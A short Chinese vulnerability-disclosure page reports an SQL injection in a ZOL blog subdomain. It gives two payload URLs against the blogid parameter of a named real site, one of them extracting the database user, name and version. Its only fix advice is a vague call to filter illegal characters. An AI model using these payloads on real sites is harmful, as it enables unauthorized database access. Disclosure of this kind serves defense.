当前位置: 移动技术网 > 网络运营>安全>漏洞 > 中关村在线博客子站SQL注入及修复方案

中关村在线博客子站SQL注入及修复方案

2018年03月05日  | 移动技术网网络运营  | 我要评论

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,concat(user(),0x7c,database(),0x7c,version()),4,5-- 



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。 

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网